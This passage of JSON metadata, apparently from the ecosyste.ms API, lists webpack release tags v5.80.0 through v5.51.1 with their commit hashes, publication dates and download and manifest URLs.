epositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48